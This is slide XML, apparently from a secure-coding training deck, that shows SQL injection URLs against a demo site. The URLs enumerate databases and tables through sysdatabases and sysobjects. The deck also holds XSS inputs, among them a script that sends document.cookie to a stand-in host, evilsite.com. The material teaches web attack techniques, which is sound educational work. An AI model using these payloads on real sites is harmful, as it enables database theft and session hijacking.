        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3129958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http://www.securecoding.com/Widgets.aspx?CategoryId=x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://www.securecoding.com/Widgets.aspx?CategoryId=3000000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA"/>
              <a:t>http://www.securecoding.com/Widgets.aspx?CategoryId=1&amp;TypeId=x</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1985319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http://injection.securecoding.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>Product.aspx?ProductSubCategoryId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=2%20or%201=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=(SELECT name FROM master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>sysdatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>dbid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> =1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SELECT name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 'U' order by name OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3188809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dirty="0"/>
              <a:t>http://injection.securecoding.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>Product.aspx?ProductSubCategoryId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=2%20or%201=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=(SELECT name FROM master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>sysdatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>dbid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> =1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SELECT name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 'U' order by name OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1489387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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>&gt;Oops XSS!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Test&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>='http://www.evilsite.com/CookieStealer.html?cookie='%2Bdocument.cookie;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1550572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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>&gt;Oops XSS!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Test&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>='http://www.evilsite.com/CookieStealer.html?cookie='%2Bdocument.cookie;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418736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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>&gt;Oops XSS!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Test&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>='http://www.evilsite.com/CookieStealer.html?cookie='%2Bdocument.cookie;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="643654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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>&gt;Oops XSS!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Test&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>='http://www.evilsite.com/CookieStealer.html?cookie='%2Bdocument.cookie;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4012804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Session types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Session timeouts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6857540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on white">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0751D7-21B4-427C-964E-AC2C0CD87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148575" y="1520825"/>
            <a:ext cx="3894851" cy="3810079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75165ABD-DA59-43E8-B75E-7DAD51434995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228903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elcome on red">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>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BA9BB90F-B29C-4CA6-8A79-ABFA45FF9FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772156" y="1023781"/>
            <a:ext cx="8647689" cy="4810438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F6556E1-26D3-4635-B9FE-591097252A11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4182538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elcome on yellow">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>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0AAA1BD8-C6B1-4CB0-9DFB-2843B9197074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772156" y="1023781"/>
            <a:ext cx="8647689" cy="4810438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51685E76-4AAB-40D6-87DF-449D41B7C901}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2933264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elcome on orange">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent3"/>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771099A8-DE03-4E8D-BF7E-90D156E1D720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772156" y="1023781"/>
            <a:ext cx="8647689" cy="4810438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81B0B9B5-E98B-44E8-A2CA-DCC3F4A5ED41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1588610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elcome on pink">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent4"/>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48403EA-A1C8-4D83-80E3-72146752402D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772156" y="1023781"/>
            <a:ext cx="8647689" cy="4810438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E373A5AA-21ED-4958-A70D-F8AFFC3BB1FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
